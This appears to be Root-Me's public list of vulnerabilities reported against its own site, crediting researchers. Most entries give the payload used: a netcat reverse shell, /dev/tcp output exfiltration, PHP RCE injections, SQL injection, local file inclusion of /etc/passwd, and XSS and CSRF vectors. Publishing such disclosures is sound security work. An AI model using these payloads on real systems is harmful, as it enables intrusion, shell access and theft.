Discovered Weaknesses
与任何信息系统一样,在网站上也发现了一些不足之处。
26/08/2024 Mika
has identified an OS Command Injection vulnerability that allows a user to gain root access to challenge servers when deploying a challenge with a malicious flag.
- RM{' && nc.traditional 51.75.X.X 4444 -e /bin/bash #}
07/02/2024 Nishacid
Has identified a stored XSS vulnerability in translations, allowing a member of the association to modify any of the site’s translations with JavaScript code by using :
<img/src/onerror=confirm(document.domain)>
22/11/2023 Laluka
Has identified a stored XSS (through file upload) to RCE via code injection on the mediabox configuration. PHP code is reflected (json_dump) and then evaluated; the targeted account must be webmestre.
const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);
14/07/2023 Elweth
Detected a vulnerability in the version of Chrome Headless that bots use for Web-Client challenges. The version in question was vulnerable to CVE-2021-21224, which could lead to code execution in the bot’s environment.
27/08/2022 Laluka
Has identified a vulnerability where changing the status of the site’s content (doc, challenge, post, ...) to a higher level (e.g. from draft to evaluation or from trash to writing) triggers an email to be sent to the challenge author and/or webmaster. Some variables such as the title and content are not properly encoded or escaped before being passed to the eval function which renders the email. This allowed for a Blind-RCE to occur with a payload such as <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?>
in the title or content of the article.
21/07/2022 Abyss Watcher & SpawnZii
have identified a remote code execution (RCE) vulnerability allowing a privileged user to execute PHP code:
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>
11/07/2022 Abyss Watcher
identified a stored XSS vulnerability exploitable with an iframe hosted on RM domain :
<iframe src="https://www.root-me.org/IMG/html/xss.html">
17/03/2022 Mizu
identified a stored XSS vulnerability exploitable with an iframe hosted on a malicious domain starting with www.root-me.org :
<iframe src="https://www.root-me.org.evil.domain/">
23/11/2021 zLade
identified a vulnerability allowing a member of the association to elevate his role to administrator simply by using the private interface of SPIP.
01/10/2021 Podalirius
identified a vulnerability allowing access to documents attached to solutions without restrictions :
<imgXX>
15/05/2020 Laluka
identified multiples vulnerabilities : 3 reflected XSS, 2 SQLi and 1 RCE :
https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E
12/01/2020 NonStandardModel
identified an XSS vulnerability in the name of the file imported on http://repository.root-me.org/
04/06/2019 warlock
identified an XSS vulnerability. This one required a user intervention on the chatbox (a click on the previous page).
http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>
04/06/2019 warlock
has identified a vulnerability allowing to kill, with an unprivileged user, the database available on the challenge01 server which hosts several challenges, by saturating the memory in a particular way in order to kill the process of his choice. This allowed to restart another binary instead listening on the same port via a race condition.
16/11/2018 Hacqueen
identified a vulnerability allowing to trap the users of the store through an iframe via a spreadshirt domain controlled by the attacker (e.g. spreadshirt.ro), the lang parameter was not filtered correctly.
12/04/2018 DrStache & urandom
identified a stored XSS vulnerability in the OSM map in the CTFATD rooms by injecting the following payload into the user’s bio (https://www.root-me.org/?page=preferences&lang=en)
<svg onload=console.log(document.domain)>
12/10/2015 ST4HLKR1EG
has identified an "Insecure Direct Object Reference" vulnerability allowing to read any private message :
page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]
03/2015 WtF
has identified a remote code execution (RCE) vulnerability in a challenge being evaluated on the production server, allowing it to access the file system with ssh and to execute commands.
03/2015 WtF
has identified an arbitrary file inclusion vulnerability (LFI) in the Path Truncation web-server challenge that allows it to read files from other challenges.
15/06/2013 LouTerrailloune
has identified a PHP code injection vulnerability on the "code - decode" page:
Text to decode in base64 :
PD9waHAgcGhwaW5mbygpOyA/Pg==
06/11/2012 jimee
found several stored XSS in the user profile management :
<script>[code javascript/vbscript]</script>
20/03/2012 jimee
found a LFI in a challenge :
http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php
23/10/2011 courte66
found a reflected XSS in the "encode - decode" page :
Text to decode in base64
Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=
02/10/2011 Hypnoze
found a insecure indirect object references which lead to unauthorized access to all PM :
http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]
11/07/2011 Armel
found a stored XSS on the chatbox.
<iframe src="javascript:[code javascript]' />
18/07/2011 g0uZ
found a PHP code injection vulnerability on the "online tools : nmap"
Host to scan in -sV mode :
--version-trace -p8888 [IP server attacker]
Service listening on attacker server
i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done
30/06/2011 elyfean
found a CSRF on the chatbox :
<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>
15/02/2011 EsSandre
found a LFI :
http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd
02/02/2011 hello
found several stored XSS in the PM system :
<script>[code javascript/vbscript]</script>
02/12/2009 real
found a code injection vulnerability :
http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'